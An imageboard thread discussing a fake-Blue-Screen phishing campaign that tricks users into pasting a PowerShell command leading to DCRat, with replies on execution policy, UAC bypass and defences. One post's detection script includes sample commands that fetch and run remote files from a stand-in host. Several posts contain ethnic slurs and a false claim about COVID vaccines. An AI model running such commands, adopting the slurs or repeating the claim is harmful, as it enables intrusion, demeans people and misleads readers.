Do people really fall for this? Like college educated people with important shit on their computers?
>An email arrives with subject "Reservation Cancellation." Sender appears to be Booking.com. The message mentions a refund over €1,000 and urges the recipient to click and review. Booking.com has been a popular target before, with similar campaigns in 2023 and 2024.
>The link leads to a perfect clone of Booking.com with the correct colors, logos, and fonts. Indistinguishable from the real site.
>Then a loading error appears. "Taking too long. Click to refresh." One click and the browser goes fullscreen.
>A Blue Screen of Death fills the screen.
>But Windows is not crashing. This is a webpage designed to look exactly like a system failure. The victim cannot easily escape.
>Instructions appear: press Win+R, then CTRL+V, then Enter.
>The malicious webpage runs JavaScript that silently copies the PowerShell command to the clipboard the moment you click. You never see it happen. When you press CTRL+V in the Run dialog, it's already there waiting.
>The victim thinks they are fixing their computer. What they are actually doing is pasting a malicious PowerShell command that was silently copied to their clipboard.
>The command downloads a project file and Windows' own MSBuild.exe compiles it into malware. This is called living off the land: using trusted system tools against the user.
>The malware disables Windows Defender, adds exclusions, and establishes persistence. Then it injects the final payload into a Windows process.
>The payload is DCRat. A remote access trojan available since 2018. Price on underground forums: $5 for two months. $40 for lifetime access.
>What DCRat can do: keylogging, webcam access, file theft, password extraction, remote desktop, dropping additional malware.
>>107793114
yeah people fall for it, one day my dad had an even more not subtle shit paint.ms "we're the police you need to pay". dad yelled, thank god he didn't click anything but if i wasn't there probably he would have. you can't blame them, stop explorer.exe and people are more panicked than a kernel panicking. I would be glad to teach him basic computer literacy but it's impressive how boomers are unwilling to learn if people are younger, they really got a big ego.
wouldn’t work on my computer even if I did fall for this, PS execution policy prevents this + UAC requires username and password every time for elevation. I also do not log in as an administrator but a standard user. The built-in admin account has also been renamed and its password scrambled + logon disabled.
>>107793114
is this an ad for dcrat or something?
>>107793114
>Step code
should be Stop code, and it isn't supposed to be monospace in a box. I think new versions of windows don't even use a stop code anymore, they use a string.
>0x00000fVA
lol
>>107793173
Boomers have no incoming information filter, they literally just believe everything that is said to them on TV, over the phone, and on the internet. NPC cattle
>>107793527
>PS execution policy prevents this
It doesn't. Execution policy is security theater and can be bypassed by using the Run dialog. Also you don't need admin permission to keylog and steal your passwords, so UAC is also security theater. The only prevention against malware is just to not open the fucking malware
>>107793114
The only time boomers will actually follow the instructions on screen
>>107793114
It's the most fundamental problem in computer security. The users. You can have all the security features you want, if the user runs an unsandboxed malware payload themselves, they are simply fucked and nothing can help them here.
>>107793114
About 10 years ago my mom fell for the old error messages send me apple cards scam on my computer of all things, luckily the retard must've been new cuz they didn't setup anything on my pc even after she gave them access to it.
>>107793557
> and can be bypassed by using the Run dialog
not on my machine, learn how to configure.
>>107793645
I don't need to learn how to configure. I just don't run random commands people put on the internet. I don't want any of that execution policy bullshit interfering with my own scripts, of which I have several to organize and rename files. I always set it to Unrestricted when I do a new OS install.
>>107793671
So you're retarded and just let anything run rather than signing your own scripts with your own certificate. Can't wait until you get zero day'd LMAO
>>107793509
kys
>>107793114
>Do people really fall for this?
Yes and anyone that does should lose their voting rights for life. If you are that fucking retarded you can't even reasonably be assumed to make decisions for yourself never mind decisions that will affect other people.
>>107793114
They do. t. work consumer tech support, they don't know it's just a malicious notification or even try pressing ctrl+alt+del
>>107793527
You're literally the only person who runs their Windows in this configuration. Nobody does this. I know this because I did run a configuration like this in the past when I still used Windows and like 50% of Windows software was broken in some way. Clearly nobody who develops software for Windows even tests or thinks about this use case.
>>107793114
A problem easily solved by removing india and the asias excluding korea/japan from the internet. I hate to victim blame but we really need to take some responsibility. We don't let children drink, why should we let uncivilized people on the internet?
>>107795228
I hope you realize the primary target for these is Americans and British to a lesser extent.
>>107795712
Good job missing the point entirely. We'll add you to the list as an honorary poop skin.
>>107795727
Do you know what the word "victim" means? If you're scamming someone, you're not a victim of the person you're scamming.
>>107795742
Bro please go back and read the original post you are embarrassing yourself.
>>107795773
I did read the original post, that's the problem. You're relying on nobody (including yourself) reading it. We don't let children drink. Why? Because they don't know any better and become a victim of alcohol abuse. We don't let uncivilized people on the internet. Why? Because they become a victim of scams...? You said something completely retarded. A huge portion of scams is conducted by people located in EU and USA by the way. So even if I were to be charitable and interpret your post as "if we remove the browns from the Internet, scams will completely stop", you'd still be wrong and retarded.
>>107795801
Bro please I am begging you, at this point it's just sad for both of us. Ask a teacher or a trusted adult for help in understanding the post.
>>107795815
No amount of begging is going to make me not notice how retarded you are, I'm afraid. No amount of reading your post again is going to change the fact that you've made a malformed post because your low IQ was unable to comprehend the words you were using in the context that you used them in. Maybe this is an ESL problem on your part, but I've seen Americans with English skills just as inadequate as yours.
>>107795841
I'm sorry you're so upset about a post you didn't even understand. It's been fun playing with you though.
>>107795854
Whatever helps you cope, retard. Maybe you should try learning English at a level where you can actually communicate what you mean, not what you think you mean but nobody else is gonna get lmao.
>>107795801
Not letting your kid drink is actually what turns them into alcohol abusers because they're not exposed to it, don't understand it and see it as rebelling against parents, which then leads to degenerate behaviour with toxic peers leading to bad addictions in early adulthood. Every alchy/druggie I know had parents who were strict as fuck about it, and they all just went behind their backs and did it anyways without any kind of self control or reasonable amount. My parents let my sister and me have a beer with pizza every now and then and neither one of us has substance abuse problems, probably because there was no novelty to it at all by the time our peers were doing it
>>107793114
> about:config
> full-screen-api.enabled = false
Solved with Firefox.
>>107795107
Fucking MS setting the default user as an administrator role and now every windows software expects that as the norm.
>>107798405
if you have mozilla trash willingly installed then you already skipped most of the steps in the op and went directly to exposing yourself as a retard
Microsoft allowing users to have access to the cmd screen is retarded anyway. Nobody needs this except for hackers.
>>107798405
Interesting, is there a way to only allow it on specific websites or only while a video is playing?
>>107798511
Ok, just do the same in chrome, dumb nigger
>>107793114
*laughs in QubesOS*
I am immune to these tricks
>>107793114
*laughs in simplewall*
Aaand that's why firewalls are important, folks.
>>107793114
People are falling for this just as often as the fake captcha prompts asking users to do the same thing. When developers do it, their company ends up contracting Incident Response services. Sysadmins should just disable all users' Win+R runbox shortcut through GPO at this point.
>>107800651
You live in an era where videogame mods and fanart are subscription services. Do you really not expect malware to follow suit?
>>107793114
I hate indians so much. Yea if you fall for it you were ignorant but keep in mind 95% of this shit is indian. We MUST segregate the internet from that shithole.
you all use mas already
>>107793527
>execution policy
Do people really believe this shit actually does anything? There is still Windows Script Host as well.
>>107793685
You realize you can trivially craft a script block and execute it right retard? You actually sign PowerShell scripts? Your sigs are probably bigger than your files. Jesus Christ.
>>107800651
SaaS is the most common way malware is deployed now, and vendor reputation is the only thing that stops the vendor from sniping clients' victims (so yes it happens sometimes)
>>107793527
In many instances, especially with fake captcha variants, it does not use powershell (it executes msiexec or mshta on a remote url) and runs the installer/Microsoft HTML app with user privileges -> then launches an explorer session with the UAC skip parameter -> info stealer. Those protections do not apply.
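Added example, not written by anyone in this thread: detection logic for the two chains described here, the OP's Win+R paste into PowerShell followed by MSBuild.exe, and the mshta/msiexec variant in the post above. It runs over constructed Sysmon-style process-creation events; every pid, path and URL is made up, and the rule names are my own.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (sample data, not real telemetry).
# Pids, paths and URLs are invented; "example.invalid" never resolves.
SAMPLE_EVENTS = [
    {"pid": 5021, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://example.invalid/p.csproj -OutFile $env:TEMP\p.csproj"'},
    {"pid": 5033, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"MSBuild.exe C:\Users\u\AppData\Local\Temp\p.csproj"},
    {"pid": 5040, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "mshta https://example.invalid/update.hta"},
    {"pid": 5050, "image": r"C:\Windows\System32\notepad.exe",  # benign Run dialog use
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "notepad"},
    {"pid": 6000, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",  # benign IDE build
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj"},
]

RUN_DIALOG_INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "msiexec.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)

def basename(path):
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return the matching rule name, or None when the event looks benign."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event["cmdline"]
    # Rule 1: the Run dialog launches its child from explorer.exe. A shell or script host
    # started that way with a URL on its command line matches the paste-to-Run pattern,
    # covering both the PowerShell chain and the mshta/msiexec variant. Requiring the URL
    # keeps ordinary double-clicks in Explorer (also parented by explorer.exe) out.
    if parent == "explorer.exe" and image in RUN_DIALOG_INTERPRETERS and URL_RE.search(cmd):
        return "run_dialog_remote_fetch"
    # Rule 2: MSBuild compiling a project from a user-writable directory, or launched by a
    # shell instead of an IDE/build tool, is the living-off-the-land step.
    if image == "msbuild.exe" and (parent in RUN_DIALOG_INTERPRETERS or USER_WRITABLE_RE.search(cmd)):
        return "msbuild_lolbin_from_shell"
    return None

def detect(events):
    """Map pid -> rule name for every event that matched a rule."""
    return {e["pid"]: rule for e in events if (rule := classify(e))}

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS).items():
        print(pid, rule)
```

Rule 2 fires on the MSBuild step even if the initial paste was missed, so a hit on it alone is still worth pulling the parent chain for.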
Besides some severe shit like malware depending on devs being retarded and introducing backdoors via bugs (and you cannot prove whether it's intentional or if devs are really that fucking retarded), yes, malware can only abuse low IQs.Funny how folklore about vampires was all it took to explain everyone who wants to harm you by teaching some accountability for your own actions but suddenly now it's some le evil spook o algo.
lol darkcomet is still around?
>>107793114
>Do people really fall for this? Like college educated people with important shit on their computers?
where were you in 2021? people stood in line to inject themselves with literally untested science juice that was quickly and hastily produced in order to get immunized (they didn't) from the common cold, and then when they felt that a needle inside their hearts they just said "Coincidence". so yes, people do fall for these kinds of things, because people are fucking stupid
>>107804018
>>>/pol/
>>107793114
Why is it written like a retard?
>>107804120
indians and russians, sometimes the french
>>107801478
>UAC skip parameter
does not work in AAM + enhanced UAC
>>107795107
Everything seems to work for me, even my gachaslop works fine (Zenless Zone Zero). If it doesn't, right-click Run as Admin makes it work (though I am discretionary in what I give an admin token to).
>>107800839
https://www.f-secure.com/gb-en/articles/how-to-disable-windows-script-host
>>107793557
Mind explaining how this malware can disable Defender without administrative privileges?
>>107793570
underappreciated post thanks anon
>>107804247
you don't need to disable defender to keylog, retard
>>107804247
https://attack.mitre.org/techniques/T1548/002/
Might have answered this myself based on another post in here.
>>107804270
Hey, be nice lol. The biggest part of the OP's attack chain was disabling Windows Defender so an ancient RAT can run without being quarantined right away. Why are you talking about keylogging?
>>107804299
> If the UAC protection level of a computer is set to anything but the highest level
zzz zzz zzz zzz zzz
not applicable to anyone tech literate. I thought this was a technology board?
Issue a fatwa against creating viruses so scammers go to hell.
>>107804299
keylogging allows you to programmatically obtain an administrator security token with which you could nuke defender from orbit, but that's irrelevant because keylogging gives you access to all valuable data going into the computer in the first place so you don't have to do any of that faggy infosec vulnerability chain shit
>>107793570
this actually made me laugh and become depressed at the same time. How is it so fucking accurate? Boomers just seem naturally drawn to evil and bad decisions
>>107804322
And how exactly will any of that be useful to you without the remote access that you need using a.. you know, Remote Access Trojan (RAT)?
uhhh, does ublock lite block any of this stuff?
>>107804040
he's right though? Were you one of them anon? Have you had your accounts hacked and stolen too? Because in 30 years I still have yet to have 1 single account compromised in any context at all yet somehow the mouthbreathing retarded public manages to have this happen to them yearly.
does windows defender actually fucking do anything at all? All it does is wipe all my pirated games and has yet to catch a single actually malicious program. One time it just straight up ignored a potential keylogger exe in a scan and i had to manually delete it. Good thing I never ran it but holy fuck this thing is useless
>>107804322
Hello?!? Retard here.. retard with CISSP and 12 years security analyst experience here... hello??
>>107804329
>>107793114
never give family members admin access. run your home like a business.
>>107793527
>PS execution policy prevents this
It's security theater, there is a command line switch that outright bypasses that shit. You might know that, but normie X or normie Y definitely doesn't
> UAC requires username and password every time for elevation.
Normies will autopilot enter it/press OK (since the default is being a yes/no prompt instead of being asked for the password) just like apt being a "Yes, do as I say" away from nuking your system.
>>107798808
Bumping this dead thread to check this terribly underrated post. How did simplewall suddenly disappear from this board's memory? If I remember correctly it was even removed from /g/'s wiki.